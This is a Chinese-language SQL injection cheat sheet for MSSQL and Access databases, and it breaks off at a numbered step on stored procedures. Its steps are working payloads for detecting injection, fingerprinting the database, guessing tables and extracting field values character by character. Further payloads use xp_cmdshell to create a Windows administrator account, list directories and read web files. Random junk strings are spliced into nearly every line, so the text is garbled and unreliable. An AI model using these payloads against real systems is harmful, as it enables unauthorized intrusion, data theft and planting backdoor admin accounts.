1.判断是否有注入;and 1=1 ;and 1=2 ,bzE`6
2.初步判断是否是mssql ;and user>0 s;Q0
H*51GxK
3.注入参数是字符'and [查询条件] and ''=' HL]8E}e\"
t6DgWKT6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' j#G4A%_
rE$0a-d2B
5.判断数据库系统 8s16yuM
BpBMFEiP
;and (select count(*) from sysobjects)>0 mssql $REz{xgA=
^SM>bJ1Z_
;and (select count(*) from msysobjects)>0 access f^Sl(^f
~Ap.#VIc'
\5M1;
Q=9Ce@[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 fUx;_GX?
6|:K1bI)
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 #J~
bWWZGl9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 fm]mqO
I!1|);li
9.(1)猜字段的ascii值(access) _zt)c!
bca4'`3\|
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $$F iCMI
e0;0 X7
(2)猜字段的ascii值(mssql) GB,f'Afl
~+|Vzm|S}
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 yAD-sy +/
\ GYrPf$
10.测试权限结构(mssql) gr1NcHu
ZZq]I
O:%s;p
5
!-rG1VI_S*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- mO<1&{qMZ
y/i{6P2`,D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- B0E`C
|?A:[C#X
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- X!,huB^i
OD[q
u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3Gi^TXE]
=sZ58xA
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- )hG4,0hv&
.ni<'
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =EFCd=i
AS4mJ UU9
;and 1=(select IS_MEMBER('db_owner'));-- 4}4 cA\B:n
tE'^O<
K
DpQ\q;
=T!eyGE
11.添加mssql和系统的帐户 59Lc-JJ
Y%9$!
;exec master.dbo.sp_addlogin username;-- f[}(E
;exec master.dbo.sp_password null,username,password;-- %9v l
DwmK?5 p
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- sg`
(yrN-M4~t
;exec master.dbo.xp_cmdshell 'net user username password :3b.`s(M
boS=
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Th_PmkvC
B SH2Kq
;exec master.dbo.xp_cmdshell 'net user username password /add';-- *T6*Nxs0k
+~(SeTY
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- KE[!{O^(a
C&|K7Zp0v
jYUN:
(^pIB~.z
12.(1)遍历目录 ?7=c`
4SVIdSA
;create table dirs(paths varchar(100), id int) j%+>y;).
=xw+cs1,x
;insert dirs exec master.dbo.xp_dirtree 'c:\' @*Tql:Qcd^
>piVi[`
;and (select top 1 paths from dirs)>0 -\<\OV:c*
CS'LW;#[
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U7#C. Z
Gr-~&pm
j+9;Rvt2
5'\detV_
(2)遍历目录 @eJ6UML"
w**~k]In
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3D;?X@
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 t)|~8xpP
<@Z`<T6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 R1$s1@3I|
E$.f AIt
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Upa F>,kM
71n3d~!O>
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 kx?f, ^-
12VIP-ABK
r=-b@U.fk>
Ptm=c6H('
13.mssql中的存储过程 iD*21c<